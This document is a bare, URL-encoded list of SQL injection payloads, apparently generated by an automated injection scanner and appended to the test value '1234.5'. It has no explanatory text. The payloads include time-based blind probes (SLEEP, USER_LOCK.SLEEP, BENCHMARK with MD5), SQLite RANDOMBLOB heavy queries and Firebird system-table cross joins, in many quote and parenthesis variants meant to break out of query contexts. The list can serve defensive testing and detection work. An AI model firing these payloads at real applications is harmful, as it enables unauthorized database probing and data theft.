1234.5%22%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%22Lptl%22%3D%22Lptl 1234.5%22%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%22IwRT%22%3D%22IwRT 1234.5%22%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%22MgKv%22%3D%22MgKv 1234.5%22%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%22npvr%22%3D%22npvr 1234.5%22%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%22DweP%22%20LIKE%20%22DweP 1234.5%22%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%22omFQ%22%20LIKE%20%22omFQ 1234.5%22%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%22tPXX%22%20LIKE%20%22tPXX 1234.5%22%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%22CcXS%22%20LIKE%20%22CcXS 1234.5%29%20WHERE%206856%3D6856%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- 1234.5%27%29%20WHERE%202859%3D2859%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- 1234.5%27%20WHERE%203362%3D3362%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- 1234.5%22%20WHERE%203481%3D3481%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- 1234.5%27%20%7C%7C%20%28SELECT%201729%20FROM%20DUAL%20WHERE%203718%3D3718%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201601%20WHERE%204786%3D4786%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%207506%20FROM%20DUAL%20WHERE%208877%3D8877%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20%29 1234.5%20%2B%20%28SELECT%203764%20WHERE%207388%3D7388%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20%29 1234.5%27%20%2B%20%28SELECT%20%27vDrG%27%20FROM%20DUAL%20WHERE%202132%3D2132%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27CjpT%27%20WHERE%204612%3D4612%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20%23 1234.5%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- 1234.5%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- 1234.5%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- 1234.5%22%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- 1234.5%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%287920%3D7920 1234.5%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%289286%3D9286 1234.5%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%285030%3D5030 1234.5%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- 1234.5%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%27jMTf%27%3D%27jMTf 1234.5%27%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%27Fzod%27%3D%27Fzod 1234.5%27%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%28%27UZSK%27%3D%27UZSK 1234.5%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%27fxTc%27%3D%27fxTc 1234.5%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%27NiMv%27%20LIKE%20%27NiMv 1234.5%27%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%27odvi%27%20LIKE%20%27odvi 1234.5%27%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%28%27qPKq%27%20LIKE%20%27qPKq 1234.5%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%27VTVy%27%20LIKE%20%27VTVy 1234.5%22%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%22tyuL%22%3D%22tyuL 1234.5%22%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%22GbBm%22%3D%22GbBm 1234.5%22%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%28%22gOFJ%22%3D%22gOFJ 1234.5%22%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%22ydLI%22%3D%22ydLI 1234.5%22%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%22XlHm%22%20LIKE%20%22XlHm 1234.5%22%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%22bFRC%22%20LIKE%20%22bFRC 1234.5%22%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%28%22qiob%22%20LIKE%20%22qiob 1234.5%22%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%22tgjR%22%20LIKE%20%22tgjR 1234.5%29%20WHERE%202910%3D2910%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- 1234.5%27%29%20WHERE%207826%3D7826%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- 1234.5%27%20WHERE%202864%3D2864%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- 1234.5%22%20WHERE%209144%3D9144%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- 1234.5%27%20%7C%7C%20%28SELECT%206371%20FROM%20DUAL%20WHERE%207018%3D7018%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207132%20WHERE%207747%3D7747%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%206125%20FROM%20DUAL%20WHERE%204744%3D4744%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20%29 1234.5%20%2B%20%28SELECT%207571%20WHERE%206800%3D6800%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20%29 1234.5%27%20%2B%20%28SELECT%20%27mGyy%27%20FROM%20DUAL%20WHERE%206115%3D6115%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27oEaA%27%20WHERE%207884%3D7884%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20%23 1234.5%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- 1234.5%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- 1234.5%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- 1234.5%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- 1234.5%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%288302%3D8302 1234.5%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%281340%3D1340 1234.5%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%282266%3D2266 1234.5%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- 1234.5%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%27XPxd%27%3D%27XPxd 1234.5%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%27klaw%27%3D%27klaw 1234.5%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%28%27vrwp%27%3D%27vrwp 1234.5%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%27pkbZ%27%3D%27pkbZ 1234.5%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%27hAog%27%20LIKE%20%27hAog 1234.5%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%27WKUm%27%20LIKE%20%27WKUm 1234.5%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%28%27CugL%27%20LIKE%20%27CugL 1234.5%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%27YKKZ%27%20LIKE%20%27YKKZ 1234.5%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%22LukG%22%3D%22LukG 1234.5%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%22niJH%22%3D%22niJH 1234.5%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%28%22GGvz%22%3D%22GGvz 1234.5%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%22wNsz%22%3D%22wNsz 1234.5%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%22ghXt%22%20LIKE%20%22ghXt 1234.5%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%22FOVW%22%20LIKE%20%22FOVW 1234.5%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%28%22Xnqb%22%20LIKE%20%22Xnqb 1234.5%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%22DwQh%22%20LIKE%20%22DwQh 1234.5%29%20WHERE%202758%3D2758%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- 1234.5%27%29%20WHERE%208738%3D8738%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- 1234.5%27%20WHERE%205123%3D5123%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- 1234.5%22%20WHERE%205424%3D5424%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- 1234.5%27%20%7C%7C%20%28SELECT%209537%20FROM%20DUAL%20WHERE%202184%3D2184%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208016%20WHERE%207032%3D7032%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%208070%20FROM%20DUAL%20WHERE%205692%3D5692%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20%29 1234.5%20%2B%20%28SELECT%208715%20WHERE%209533%3D9533%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20%29 1234.5%27%20%2B%20%28SELECT%20%27IznG%27%20FROM%20DUAL%20WHERE%201139%3D1139%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27uRGI%27%20WHERE%205312%3D5312%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20%23 1234.5%29%20AND%20SLEEP%285%29 1234.5%27%29%20AND%20SLEEP%285%29 1234.5%27%20AND%20SLEEP%285%29 1234.5%22%20AND%20SLEEP%285%29 1234.5%29%20AND%20SLEEP%285%29%20AND%20%281268%3D1268 1234.5%29%29%20AND%20SLEEP%285%29%20AND%20%28%289241%3D9241 1234.5%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%283218%3D3218 1234.5%20AND%20SLEEP%285%29 1234.5%27%29%20AND%20SLEEP%285%29%20AND%20%28%27mgQB%27%3D%27mgQB 1234.5%27%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%27Yoqw%27%3D%27Yoqw 1234.5%27%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%27qBRN%27%3D%27qBRN 1234.5%27%20AND%20SLEEP%285%29%20AND%20%27tUbT%27%3D%27tUbT 1234.5%27%29%20AND%20SLEEP%285%29%20AND%20%28%27hMVI%27%20LIKE%20%27hMVI 1234.5%27%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%27uNPJ%27%20LIKE%20%27uNPJ 1234.5%27%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%27XvYI%27%20LIKE%20%27XvYI 1234.5%27%20AND%20SLEEP%285%29%20AND%20%27jlBw%27%20LIKE%20%27jlBw 1234.5%22%29%20AND%20SLEEP%285%29%20AND%20%28%22QqWw%22%3D%22QqWw 1234.5%22%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%22hhJY%22%3D%22hhJY 1234.5%22%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%22PfBi%22%3D%22PfBi 1234.5%22%20AND%20SLEEP%285%29%20AND%20%22jtFk%22%3D%22jtFk 1234.5%22%29%20AND%20SLEEP%285%29%20AND%20%28%22RfIL%22%20LIKE%20%22RfIL 1234.5%22%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%22lHmz%22%20LIKE%20%22lHmz 1234.5%22%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%22jtgy%22%20LIKE%20%22jtgy 1234.5%22%20AND%20SLEEP%285%29%20AND%20%22LnCa%22%20LIKE%20%22LnCa 1234.5%29%20WHERE%202831%3D2831%20AND%20SLEEP%285%29 1234.5%27%29%20WHERE%209103%3D9103%20AND%20SLEEP%285%29 1234.5%27%20WHERE%206686%3D6686%20AND%20SLEEP%285%29 1234.5%22%20WHERE%201482%3D1482%20AND%20SLEEP%285%29 1234.5%27%20%7C%7C%20%28SELECT%206214%20FROM%20DUAL%20WHERE%205787%3D5787%20AND%20SLEEP%285%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204737%20WHERE%207961%3D7961%20AND%20SLEEP%285%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%205281%20FROM%20DUAL%20WHERE%207959%3D7959%20AND%20SLEEP%285%29%20%29 1234.5%20%2B%20%28SELECT%201912%20WHERE%206797%3D6797%20AND%20SLEEP%285%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27UWsD%27%20FROM%20DUAL%20WHERE%201535%3D1535%20AND%20SLEEP%285%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27WsgG%27%20WHERE%202518%3D2518%20AND%20SLEEP%285%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%20SLEEP%285%29%20%23 1234.5%29%20AND%20SLEEP%285%29%23 1234.5%27%29%20AND%20SLEEP%285%29%23 1234.5%27%20AND%20SLEEP%285%29%23 1234.5%22%20AND%20SLEEP%285%29%23 1234.5%29%20AND%20SLEEP%285%29%23%20AND%20%288947%3D8947 1234.5%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%287251%3D7251 1234.5%29%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%281841%3D1841 1234.5%20AND%20SLEEP%285%29%23 1234.5%27%29%20AND%20SLEEP%285%29%23%20AND%20%28%27TExd%27%3D%27TExd 1234.5%27%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%27DSNp%27%3D%27DSNp 1234.5%27%29%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%28%27fuPs%27%3D%27fuPs 1234.5%27%20AND%20SLEEP%285%29%23%20AND%20%27LHyT%27%3D%27LHyT 1234.5%27%29%20AND%20SLEEP%285%29%23%20AND%20%28%27CYKP%27%20LIKE%20%27CYKP 1234.5%27%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%27zadK%27%20LIKE%20%27zadK 1234.5%27%29%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%28%27wZkE%27%20LIKE%20%27wZkE 1234.5%27%20AND%20SLEEP%285%29%23%20AND%20%27MCea%27%20LIKE%20%27MCea 1234.5%22%29%20AND%20SLEEP%285%29%23%20AND%20%28%22lmZw%22%3D%22lmZw 1234.5%22%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%22QnKO%22%3D%22QnKO 1234.5%22%29%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%28%22ynIn%22%3D%22ynIn 1234.5%22%20AND%20SLEEP%285%29%23%20AND%20%22Rxrg%22%3D%22Rxrg 1234.5%22%29%20AND%20SLEEP%285%29%23%20AND%20%28%22SAUI%22%20LIKE%20%22SAUI 1234.5%22%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%22tbcG%22%20LIKE%20%22tbcG 1234.5%22%29%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%28%22Weuw%22%20LIKE%20%22Weuw 1234.5%22%20AND%20SLEEP%285%29%23%20AND%20%22PCec%22%20LIKE%20%22PCec 1234.5%29%20WHERE%208539%3D8539%20AND%20SLEEP%285%29%23 1234.5%27%29%20WHERE%204539%3D4539%20AND%20SLEEP%285%29%23 1234.5%27%20WHERE%209056%3D9056%20AND%20SLEEP%285%29%23 1234.5%22%20WHERE%205355%3D5355%20AND%20SLEEP%285%29%23 1234.5%27%20%7C%7C%20%28SELECT%205733%20FROM%20DUAL%20WHERE%209139%3D9139%20AND%20SLEEP%285%29%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202487%20WHERE%209222%3D9222%20AND%20SLEEP%285%29%23%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%202317%20FROM%20DUAL%20WHERE%204794%3D4794%20AND%20SLEEP%285%29%23%20%29 1234.5%20%2B%20%28SELECT%203859%20WHERE%209893%3D9893%20AND%20SLEEP%285%29%23%20%29 1234.5%27%20%2B%20%28SELECT%20%27oTeT%27%20FROM%20DUAL%20WHERE%209465%3D9465%20AND%20SLEEP%285%29%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27rrAU%27%20WHERE%204290%3D4290%20AND%20SLEEP%285%29%23%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%20SLEEP%285%29%23%20%23 1234.5%29%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29 1234.5%27%29%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29 1234.5%27%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29 1234.5%22%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29 1234.5%29%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20AND%20%283579%3D3579 1234.5%29%29%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20AND%20%28%281403%3D1403 1234.5%29%29%29%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20AND%20%28%28%284762%3D4762 1234.5%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29 1234.5%27%29%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20AND%20%28%27PKDu%27%3D%27PKDu 1234.5%27%29%29%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20AND%20%28%28%27VTmj%27%3D%27VTmj 1234.5%27%29%29%29%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20AND%20%28%28%28%27VGID%27%3D%27VGID 1234.5%27%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20AND%20%27MNBS%27%3D%27MNBS 1234.5%27%29%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20AND%20%28%27AVuh%27%20LIKE%20%27AVuh 1234.5%27%29%29%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20AND%20%28%28%27CsAl%27%20LIKE%20%27CsAl 1234.5%27%29%29%29%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20AND%20%28%28%28%27iuci%27%20LIKE%20%27iuci 1234.5%27%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20AND%20%27rDlV%27%20LIKE%20%27rDlV 1234.5%22%29%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20AND%20%28%22zfkJ%22%3D%22zfkJ 1234.5%22%29%29%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20AND%20%28%28%22ziEq%22%3D%22ziEq 1234.5%22%29%29%29%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20AND%20%28%28%28%22Fqnf%22%3D%22Fqnf 1234.5%22%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20AND%20%22PPPG%22%3D%22PPPG 1234.5%22%29%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20AND%20%28%22huck%22%20LIKE%20%22huck 1234.5%22%29%29%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20AND%20%28%28%22IkzD%22%20LIKE%20%22IkzD 1234.5%22%29%29%29%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20AND%20%28%28%28%22CYXq%22%20LIKE%20%22CYXq 1234.5%22%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20AND%20%22VyjB%22%20LIKE%20%22VyjB 1234.5%29%20WHERE%206758%3D6758%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29 1234.5%27%29%20WHERE%206211%3D6211%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29 1234.5%27%20WHERE%203750%3D3750%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29 1234.5%22%20WHERE%204800%3D4800%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29 